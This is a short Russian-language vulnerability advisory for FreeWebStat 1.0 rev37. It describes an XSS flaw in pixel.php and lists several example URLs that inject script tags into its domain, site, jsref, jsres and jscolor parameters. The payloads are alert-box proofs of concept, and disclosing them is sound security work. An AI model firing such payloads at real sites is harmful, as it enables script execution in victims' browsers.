Программа: FreeWebStat 1.0 rev37

Уязвимость позволяет удаленному пользователю произвести XSS нападение.
Уязвимость существует из-за недостаточной обработки входных данных в различных
параметрах. Удаленный пользователь может с помощью специально сформированного
запроса выполнить произвольный HTML код в браузере жертвы в контексте
безопасности уязвимого сайта.

Пример:

http://local.asciistation.zapto.org/fws/pixel.php?domain=<script>alert(1)</script>&site=<script>alert(2)</script>&jsref=<script>
alert(3)</script>&jsres=<script>alert(4)</script>&jscolor=<script>alert(5)</script>

http://local.asciistation.zapto.org/fws/pixel.php?
domain=ush.it&site=<script>alert(123)&jsref=1024×768 &jsres=1337&jscolor=red

http://local.asciistation.zapto.org/fws/pixel.php?
domain=ush.it&site=aa&jsref=http://ww.tin.it&jsres=1337&jscolor=red

http://local.asciistation.zapto.org/fws/pixel.php?
domain=ush.it&site=aa&jsref=http://ww.tin.it&jsres=13
37&jscolor=red

http://local.asciistation.zapto.org/fws/pixel.php?
domain=<script>alert(1)</script>&site= <script>alert(2)&jsref=</script><script>alert(3)</script>
&jsres=<script>alert(4)</script>&jscolor= <script>alert(5)</script>

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии